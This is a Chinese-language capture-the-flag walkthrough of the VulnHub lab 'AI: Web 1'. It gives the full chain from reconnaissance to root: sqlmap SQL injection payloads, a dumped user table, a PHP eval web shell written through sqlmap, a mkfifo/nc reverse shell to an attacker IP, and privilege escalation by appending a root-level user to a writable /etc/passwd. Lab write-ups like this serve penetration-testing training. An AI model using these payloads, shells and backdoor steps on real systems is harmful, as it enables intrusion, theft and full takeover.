靶机下载官网AI: Web: 1 ~ VulnHub
靶机描述
Difficulty: IntermediateNetwork: DHCP (Automatically assign)Network Mode: NATThis box is designed to test skills of penetration tester. The goal is simple. Get flag from /root/flag.txt. Enumerate the box, get low privileged shell and then escalate privilege to root. For any hint please tweet on @arif_xpress难度:中级
网络:DHCP(自动分配)
网络模式:NAT这个盒子旨在测试渗透测试人员的技能。目标很简单。从/root/flag.txt中获取标志(flag)。对盒子进行枚举,获取低权限的shell,然后将权限提升到root。如需任何提示,请在推特上关注@arif_xpress。
靶机界面
信息收集
主机发现
┌──(kali💋kali)-[~]
└─$ sudo nmap -sP 10.4.7.0/24 -oN nmap.sP
Starting Nmap 7.93 ( https://nmap.org ) at 2025-02-12 11:51 CST
Nmap scan report for 10.4.7.2
Host is up (0.00024s latency).
MAC Address: 00:50:56:E0:20:34 (VMware)
Nmap scan report for 10.4.7.179
Host is up (0.00064s latency).
MAC Address: 00:0C:29:42:F7:5E (VMware)
Nmap scan report for 10.4.7.254
Host is up (0.0015s latency).
MAC Address: 00:50:56:E4:E4:95 (VMware)
Nmap scan report for 10.4.7.139
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.98 seconds
端口扫描
┌──(kali💋kali)-[~]
└─$ sudo nmap -A -T4 -sC -p- -sT 10.4.7.179 -oN nmap.A
Starting Nmap 7.93 ( https://nmap.org ) at 2025-02-12 11:55 CST
Nmap scan report for 10.4.7.179
Host is up (0.00052s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd
|_http-title: AI Web 1.0
| http-robots.txt: 2 disallowed entries
|_/m3diNf0/ /se3reTdir777/uploads/
|_http-server-header: Apache
MAC Address: 00:0C:29:42:F7:5E (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hopTRACEROUTE
HOP RTT ADDRESS
1 0.52 ms 10.4.7.179OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.68 seconds
网站信息
网站首页
nikto 报告
┌──(kali💋kali)-[~]
└─$ nikto -h http://10.4.7.179/ 130 ⨯
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.4.7.179
+ Target Hostname: 10.4.7.179
+ Target Port: 80
+ Start Time: 2025-02-12 12:35:32 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: contains 2 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /: Server may leak inodes via ETags, header found with file /, inode: 8d, size: 590703a18e440, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8104 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2025-02-12 12:39:25 (GMT8) (233 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
robots.txt
Disallow: /m3diNf0/
Disallow: /se3reTdir777/uploads/
/se3reTdir777/目录
敏感目录扫描
/m3diNf0/目录扫描
dirb扫描器
┌──(kali💋kali)-[~]
└─$ dirb http://10.4.7.179/m3diNf0/ 1 ⨯-----------------
DIRB v2.22
By The Dark Raver
-----------------START_TIME: Wed Feb 12 12:47:36 2025
URL_BASE: http://10.4.7.179/m3diNf0/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.4.7.179/m3diNf0/ ----
+ http://10.4.7.179/m3diNf0/info.php (CODE:200|SIZE:84260)
-----------------
END_TIME: Wed Feb 12 12:47:40 2025
DOWNLOADED: 4612 - FOUND: 1
dirsearch扫描器
扫出了/info.php
提取敏感信息
User/Group www-data(33)/33
DOCUMENT_ROOT /home/www/html/web1x443290o2sdf92213se3reTdir777 目录扫描
┌──(kali💋kali)-[~]
└─$ dirb http://10.4.7.179/se3reTdir777/-----------------
DIRB v2.22
By The Dark Raver
-----------------START_TIME: Wed Feb 12 16:17:39 2025
URL_BASE: http://10.4.7.179/se3reTdir777/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.4.7.179/se3reTdir777/ ----
+ http://10.4.7.179/se3reTdir777/index.php (CODE:200|SIZE:1228)
==> DIRECTORY: http://10.4.7.179/se3reTdir777/uploads/
---- Entering directory: http://10.4.7.179/se3reTdir777/uploads/ ----
-----------------
END_TIME: Wed Feb 12 16:17:46 2025
DOWNLOADED: 9224 - FOUND: 1
找到切入点
找到提交参数,使用sqlmap找到漏洞
sudo sqlmap -u http://10.4.7.179/se3reTdir777/ -data "uid=1&Operation=Submit"
注入点信息
- 参数:
uid(POST 请求方式)- 总请求数:3940 个 HTTP (s) 请求
不同类型的注入分析
1. 布尔盲注(boolean - based blind)
- 类型描述:基于布尔条件的盲注,通常利用 SQL 语句中的布尔表达式判断条件真假来获取信息,一般在 WHERE 或 HAVING 子句中使用。
- 标题:
OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)- Payload:
uid=1' OR NOT 1507=1507#&Operation=Submit
- 原理:在原始 SQL 语句中,
1'用于闭合可能存在的单引号,OR NOT 1507=1507是一个恒为真的布尔表达式,#是 MySQL 中的注释符,用于注释掉原 SQL 语句中剩余部分,避免语法错误。通过观察页面响应的不同(如页面返回状态、内容长度等)来判断条件真假,逐步获取数据库信息。2. 错误回显注入(error - based)
- 类型描述:利用数据库在执行错误 SQL 语句时返回的错误信息来获取数据库相关信息,通常在 WHERE、HAVING、ORDER BY 或 GROUP BY 子句中使用。
- 标题:
MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)- Payload:
uid=1' AND GTID_SUBSET(CONCAT(0x71626b7171,(SELECT (ELT(6293=6293,1))),0x7176766a71),6293)-- IvZq&Operation=Submit
- 原理:
1'用于闭合单引号,AND连接后续条件,GTID_SUBSET是 MySQL 5.6 及以上版本的一个函数,CONCAT用于拼接字符串,ELT函数根据条件判断返回结果。当执行该 SQL 语句时,如果数据库版本支持且语法错误,会返回包含我们构造信息的错误信息,从而获取数据库信息。-- IvZq是注释部分,用于注释掉原 SQL 语句剩余部分。3. 时间盲注(time - based blind)
- 类型描述:基于时间延迟的盲注,通过让数据库执行
SLEEP函数来判断条件真假。如果条件为真,数据库会暂停执行一段时间,根据页面响应时间的变化来获取信息。- 标题:
MySQL >= 5.0.12 AND time-based blind (query SLEEP)- Payload:
uid=1' AND (SELECT 2955 FROM (SELECT(SLEEP(5)))xmho)-- vIYW&Operation=Submit
- 原理:
1'闭合单引号,AND连接条件,SELECT(SLEEP(5))会让数据库暂停 5 秒。如果页面响应时间明显增加,说明条件为真,反之则为假。通过多次尝试不同条件,逐步获取数据库信息。-- vIYW是注释部分。4. UNION 查询注入(UNION query)
- 类型描述:利用 SQL 的
UNION操作符将原查询结果和我们构造的查询结果合并,从而获取数据库信息。- 标题:
MySQL UNION query (NULL) - 3 columns- Payload:
uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7171,0x4d4b6756554276745a59427a6659506e676c564767696245466d67745a7669595075564c73516642,0x7176766a71)#&Operation=Submit
- 原理:
1'闭合单引号,UNION ALL用于合并查询结果,SELECT NULL,NULL,CONCAT(...)是我们构造的查询语句,需要保证列数与原查询结果一致(这里是 3 列)。CONCAT函数用于拼接字符串,我们可以通过修改拼接内容来获取不同的数据库信息。#是注释符,用于注释掉原 SQL 语句剩余部分
SQLI漏洞利用
库
sudo sqlmap -u http://10.4.7.179/se3reTdir777/ -data "uid=1&Operation=Submit" --current-db┌──(kali💋kali)-[~]
└─$ sudo sqlmap -u http://10.4.7.179/se3reTdir777/ -data "uid=1&Operation=Submit" --current-db
___
__H__
___ ___[.]_____ ___ ___ {1.7.2#stable}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:54:10 /2025-02-12/
[17:54:10] [INFO] resuming back-end DBMS 'mysql'
[17:54:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: uid=1' OR NOT 1507=1507#&Operation=SubmitType: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: uid=1' AND GTID_SUBSET(CONCAT(0x71626b7171,(SELECT (ELT(6293=6293,1))),0x7176766a71),6293)-- IvZq&Operation=SubmitType: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uid=1' AND (SELECT 2955 FROM (SELECT(SLEEP(5)))xmho)-- vIYW&Operation=SubmitType: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7171,0x4d4b6756554276745a59427a6659506e676c564767696245466d67745a7669595075564c73516642,0x7176766a71)#&Operation=Submit
---
[17:54:10] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[17:54:10] [INFO] fetching current database
current database: 'aiweb1'
[17:54:10] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.4.7.179'
[17:54:10] [WARNING] your sqlmap version is outdated[*] ending @ 17:54:10 /2025-02-12/
获取到库名aiweb1
表
sudo sqlmap -u http://10.4.7.179/se3reTdir777/ -data "uid=1&Operation=Submit" -D "aiweb1" --tables┌──(kali💋kali)-[~]
└─$ sudo sqlmap -u http://10.4.7.179/se3reTdir777/ -data "uid=1&Operation=Submit" -D "aiweb1" --tables
___
__H__
___ ___[(]_____ ___ ___ {1.7.2#stable}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:57:21 /2025-02-12/
[17:57:21] [INFO] resuming back-end DBMS 'mysql'
[17:57:21] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: uid=1' OR NOT 1507=1507#&Operation=SubmitType: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: uid=1' AND GTID_SUBSET(CONCAT(0x71626b7171,(SELECT (ELT(6293=6293,1))),0x7176766a71),6293)-- IvZq&Operation=SubmitType: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uid=1' AND (SELECT 2955 FROM (SELECT(SLEEP(5)))xmho)-- vIYW&Operation=SubmitType: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7171,0x4d4b6756554276745a59427a6659506e676c564767696245466d67745a7669595075564c73516642,0x7176766a71)#&Operation=Submit
---
[17:57:21] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[17:57:21] [INFO] fetching tables for database: 'aiweb1'
Database: aiweb1
[2 tables]
+------------+
| user |
| systemUser |
+------------+[17:57:21] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.4.7.179'
[17:57:21] [WARNING] your sqlmap version is outdated[*] ending @ 17:57:21 /2025-02-12/
列
sudo sqlmap -u http://10.4.7.179/se3reTdir777/ -data "uid=1&Operation=Submit" -D "aiweb1" --dump ┌──(kali💋kali)-[~]
└─$ sudo sqlmap -u http://10.4.7.179/se3reTdir777/ -data "uid=1&Operation=Submit" -D "aiweb1" --dump
___
__H__
___ ___[(]_____ ___ ___ {1.7.2#stable}
|_ -| . ["] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:59:20 /2025-02-12/
[17:59:20] [INFO] resuming back-end DBMS 'mysql'
[17:59:20] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: uid=1' OR NOT 1507=1507#&Operation=SubmitType: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: uid=1' AND GTID_SUBSET(CONCAT(0x71626b7171,(SELECT (ELT(6293=6293,1))),0x7176766a71),6293)-- IvZq&Operation=SubmitType: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uid=1' AND (SELECT 2955 FROM (SELECT(SLEEP(5)))xmho)-- vIYW&Operation=SubmitType: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7171,0x4d4b6756554276745a59427a6659506e676c564767696245466d67745a7669595075564c73516642,0x7176766a71)#&Operation=Submit
---
[17:59:21] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[17:59:21] [INFO] fetching tables for database: 'aiweb1'
[17:59:21] [INFO] fetching columns for table 'user' in database 'aiweb1'
[17:59:21] [INFO] fetching entries for table 'user' in database 'aiweb1'
Database: aiweb1
Table: user
[3 entries]
+----+----------+-----------+
| id | lastName | firstName |
+----+----------+-----------+
| 1 | admin | admin |
| 2 | root | root |
| 3 | mysql | mysql |
+----+----------+-----------+
拿到数据,数据为账号密码
使用sqlmap写入木马
撰写木马
┌──(kali💋kali)-[~]
└─$ vim yjh.php
┌──(kali💋kali)-[~]
└─$ cat yjh.php
<?php
@eval($_REQUEST[777]);
?>
结合上面的DOCUMENT_ROOT /home/www/html/web1x443290o2sdf92213
sqlmap -u "http://10.4.7.179/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write ./yjh.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/shell.php┌──(kali💋kali)-[~]
└─$ sudo sqlmap -u http://10.4.7.179/se3reTdir777/ -data "uid=1&Operation=Submit" --file-write ./yjh.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/shell.php
[sudo] password for kali:
___
__H__
___ ___[.]_____ ___ ___ {1.7.2#stable}
|_ -| . [,] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:31:34 /2025-02-13/
[09:31:34] [INFO] resuming back-end DBMS 'mysql'
[09:31:34] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: uid=1' OR NOT 1507=1507#&Operation=SubmitType: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: uid=1' AND GTID_SUBSET(CONCAT(0x71626b7171,(SELECT (ELT(6293=6293,1))),0x7176766a71),6293)-- IvZq&Operation=SubmitType: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uid=1' AND (SELECT 2955 FROM (SELECT(SLEEP(5)))xmho)-- vIYW&Operation=SubmitType: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7171,0x4d4b6756554276745a59427a6659506e676c564767696245466d67745a7669595075564c73516642,0x7176766a71)#&Operation=Submit
---
[09:31:34] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[09:31:34] [INFO] fingerprinting the back-end DBMS operating system
[09:31:34] [INFO] the back-end DBMS operating system is Linux
[09:31:34] [WARNING] expect junk characters inside the file as a leftover from UNION query
do you want confirmation that the local file 'yjh.php' has been successfully written on the back-end DBMS file system ('/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/shell.php')? [Y/n] y
[09:31:44] [INFO] the remote file '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/shell.php' is larger (35 B) than the local file 'yjh.php' (33B)
[09:31:44] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.4.7.179'
[09:31:44] [WARNING] your sqlmap version is outdated[*] ending @ 09:31:44 /2025-02-13/
中国蚁剑连接
密码777
获取目录并拿到shell
反弹shell
本地监听
┌──(kali kali)-[~/Documents/AI_WEB_1]
└─$ nc -lnvp 1234
listening on [any] 1234 ...服务器上执行
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.9 1234 >/tmp/f进入交互式Shell
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$查看目前身份权限
提权
全局寻找可写文件夹、文件
find / -writable -type d 2>/dev/null #文件夹
find / -writable -type f 2>/dev/null #文件
我们可以发现/etc/passwd文件有普通用户写权限
ls -la /etc/passwd
利用/etc/passwd提权
www-data@aiweb1:/etc$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
....
aiweb1pwn:x:1001:1001::/home/aiweb1pwn:/bin/sh
对root:x:0:0:root:/root:/bin/bash进行分析
root表示用户名;x表示密码hash,0表示用户ID,0表示用户组ID,/root表示用户相关信息,/bin/bash表示该用户使用何种shell执行命令
生成一个用户密码
向 /etc/passwd中写入一个用户
echo ajest:ajrFVgiA9Y9gw:0:0:root:/root:/bin/bash >> /etc/passwdsu ajest #切换用户拿到 flag
┌──(kali💋kali)-[/dev]
└─$ nc -lnvp 1234 1 ⨯
listening on [any] 1234 ...
connect to [10.4.7.139] from (UNKNOWN) [10.4.7.179] 41696
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@aiweb1:/$ su ajest
su ajest
Password: 123456root@aiweb1:/# cat /root/flag.txt
cat /root/flag.txt
####################################################
# #
# AI: WEB 1.0 #
# #
# Congratulation!!! #
# #
# Thank you for penetrate my system. #
# #
# Hope you enjoyed this. #
# #
# #
# flag{cbe5831d864cbc2a104e2c2b9dfb50e5acbdee71} #
# #
####################################################
root@aiweb1:/# ^C
